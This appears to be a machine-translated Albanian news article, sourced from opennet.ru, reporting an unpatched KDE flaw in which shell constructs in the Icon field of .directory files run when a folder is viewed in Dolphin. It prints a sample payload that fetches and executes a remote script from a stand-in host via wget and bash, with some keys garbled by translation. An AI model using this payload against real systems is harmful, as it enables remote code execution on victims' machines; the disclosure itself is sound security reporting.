Vulnerabilitet në KDE që lejon ekzekutimin e kodit gjatë shikimit të listës së skedarëve

Në KDE u identifikua vulnerabiliteti, e cila lejon sulmuesit të kryejnë komanda të rastësishme kur përdoruesi shikon një dosje ose arkiv, që përmban skedarë të veçantë të dizajnuar " .desktop " dhe " .directory ". Për sulmin, mjafton që përdoruesi të shikojë listën e skedarëve në menaxherin e skedarëve Dolphin, të ngarkojë një skedar desktop të dëmshëm ose të tërheqë ikonen në desktop ose në një dokument. Problemi shfaqet në versionin aktual të bibliotekave KDE Frameworks 5.60.0 dhe versionet më të vjetra, deri në KDE 4. Vulnerabiliteti aktualisht mbetet nuk është rregulluar (CVE nuk është atribuuar).

Problemi shkaktohet nga implementimi i papërshtatshëm i klasës KDesktopFile, e cila, gjatë përpunimit të variablës " Icon ", pa e përgatitur siç duhet, dërgon vlerën në funksionin KConfigPrivate::expandString(), i cili realizon shpërbërjen e simboleve speciale të shell, përfshirë duke përpunuar vargjet " $(..)" si komanda që duhet ekzekutuar. Pavarësisht kërkesave të specifikimit XDG, ekzekutimi i shpërbërjes e konstruksioneve shell bëhet pa ndarjen e llojit të konfigurimeve, pra jo vetëm gjatë përcaktimit të komandës që do të ekzekutohet, por gjithashtu kur përcaktohet ikonat e shfaqura si të parazgjedhura.

Për shembull, për sulmin mjaftueshëm dërgo përdoruesit një arkiv zip me një katalog që përmban skedarin «.directory» të llojit:

[Desktop Entry]
Lloji=Katalog
Ikona[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

Kur përpiqeni të shihni përmbajtjen e arkivit në menaxherin e skedarëve Dolphin, skripti https://example.com/FILENAME.sh do të shkarkohet dhe ekzekutohet.


Luaj videon

Burimi: opennet.ru

Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster